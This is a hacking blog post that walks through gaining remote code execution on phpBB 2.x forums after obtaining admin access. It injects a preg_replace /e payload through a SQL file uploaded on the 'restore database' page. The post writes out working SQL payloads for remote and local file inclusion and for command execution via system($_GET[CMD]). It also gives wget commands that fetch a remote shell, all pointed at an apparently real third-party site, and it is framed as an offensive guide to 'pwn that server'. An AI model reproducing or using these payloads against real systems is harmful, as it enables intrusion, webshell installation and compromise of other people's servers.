BLACK BURN HACKER. Powered by Blogger.

Real Money Instantly

 

Wednesday, February 1, 2012

Shelling phpBB ----> 2.x.x Remote Code Execution

0 comments
Today I'm going to be showing you how to get your shell uploaded on phpBB --> 2.x.x


Checking The Server Configuration

It's a shorter process then shelling phpBB3 forums, depending on what the server configuration is....


Once you've got your admin access, log into the admin panel and open up notepad.
On the left, you will see restore database.


[Image: 9v4gX.jpg]

It should take you to a page that looks like this...

[Image: PFukB.jpg]

Now paste this in notepad, and save it as exploit.SQL

Code:
UPDATE phpbb_users SET user_sig_bbcode_uid='(.+)/e\0', user_sig='phpbb:phpinfo();' WHERE user_id=YOUR_USER_ID;

In my case, my user id is 2. Also, your table name might not always be phpbb_users. You can guess it if you don't know it..

Now upload your exploit.SQL file in the restore database page, and click start restore.

Code:
Database Utilities : Restore
The Database has been successfully restored.

Your board should be back to the state it was when the backup was made.

[Image: KVyzH.jpg]


Now click on Forum Index on the left, and click profile.

[Image: us07S.jpg]

Now the PHP Information should be displayed on the page. This is important, it shows what limits you, and what commands you can execute.


[Image: uxhKJ.jpg]

On my site, allow_url_fopen and allow_url_include are set to on. This means I can include a local file, or a remote file depending on what functions are disabled on the server.

If you can use either of these methods, you can create a Local/Remote File Inlcusion vulnerability on the web page.
Here are some examples of LFI and RFI..

Remote File Inclusion

Code:
UPDATE phpbb_users SET user_sig_bbcode_uid='(.+)/e\0', user_sig='phpbb:include($_GET[RFI])' WHERE user_id=2;

Go back to your restore database file, and re upload your exploit and repeat the same process...

Code:
Warning: include() [function.include]: Filename cannot be empty in /home/timwan/public_html/messageboard/includes/usercp_register.php(814) : regexp code on line 1

Now you select your remote file like this when you load the webpage..

Code:
http://passfailstudios.com/messageboard/profile.php?mode=editprofile&RFI=http://site.com/shell.txt?

[Image: n30RY.jpg]

You can use the same thing, and use local files to exploit the vulnerability.

Local File Inlcusion

Code:
UPDATE phpbb_users SET user_sig_bbcode_uid='(.+)/e\0', user_sig='phpbb:include($_GET[LFI])' WHERE user_id=2;

Code:
http://passfailstudios.com/messageboard/profile.php?mode=editprofile&LFI=/proc/self/status

Name: php State: R (running) Tgid: 4517 Pid: 4517 PPid: 2788 TracerPid: 0 Uid: 32264 32264 32264 32264 Gid: 32266 32266 32266 32266 FDSize: 4096 Groups: 32266 VmPeak: 36068 kB VmSize: 36068 kB VmLck: 0 kB VmHWM: 14768 kB VmRSS: 14768 kB VmData: 5108 kB VmStk: 136 kB VmExe: 6520 kB VmLib: 22788 kB VmPTE: 112 kB VmSwap: 0 kB Threads: 1 SigQ: 0/96476 SigPnd: 0000000000000000 ShdPnd: 0000000000000000 SigBlk: fffffffe3bfbe007 SigIgn: 0000000000001000 SigCgt: 0000000184000000 CapInh: 0000000000000000 CapPrm: 0000000000000000 CapEff: 0000000000000000 CapBnd: ffffffffffffffff Cpus_allowed: 0004 Cpus_allowed_list: 2 voluntary_ctxt_switches: 11 nonvoluntary_ctxt_switches: 1


[Image: dv83e.jpg]

Now you could exploit through the process environment file, logs, or whatever else depending on what you have permissions to, or if a firewall is installed. Unforunately for me, this site has a hell of an annoying WAF.

Remote Code Execution

Now, if any of these are disabled, you're going to have some trouble. If not, we can move on to RCE through our SQL query.

Code:
system
exec
shell_exec
passthru

Now you can do something like this depending on whether the site has magic quotes enabled or not.

Code:
UPDATE phpbb_users SET user_sig_bbcode_uid='(.+)/e\0', user_sig='phpbb:system('wget http://www.site.com/shell.txt -O shell.php');' WHERE user_id=2;

Unforunately, I get syntax errors because magic quotes won't work. Now there's other methods that come in handy, using $GET requests.

Code:
UPDATE phpbb_users SET user_sig_bbcode_uid='(.+)/e\0', user_sig='phpbb:system($_GET[CMD])' WHERE user_id=2;

Code:
http://passfailstudios.com/messageboard/profile.php?mode=editprofile&CMD=ls -lua

There's that stupid WAF...

Code:
http://passfailstudios.com/messageboard/profile.php?mode=editprofile&CMD=ls

[Image: BbbnN.jpg]

Now you can download your shell, and pwn that server!

Code:
http://passfailstudios.com/messageboard/profile.php?mode=editprofile&CMD=wget http://www.site.com/shell.txt
http://passfailstudios.com/messageboard/profile.php?mode=editprofile&CMD=mv shell.txt shell.php

Then you can re check if your shell is on there.

Code:
http://passfailstudios.com/messageboard/profile.php?mode=editprofile&CMD=ls


[Image: D8Fms.jpg]

Credits

Couldn't find the actual author of the exploit, but credit goes to whoever published this on milworm.

Exploit-DB



©2011, copyright BLACK BURN

0 comments:

Post a Comment

 

7 Years Earning Experience

The Earning Source You Can Trust

Follow by Email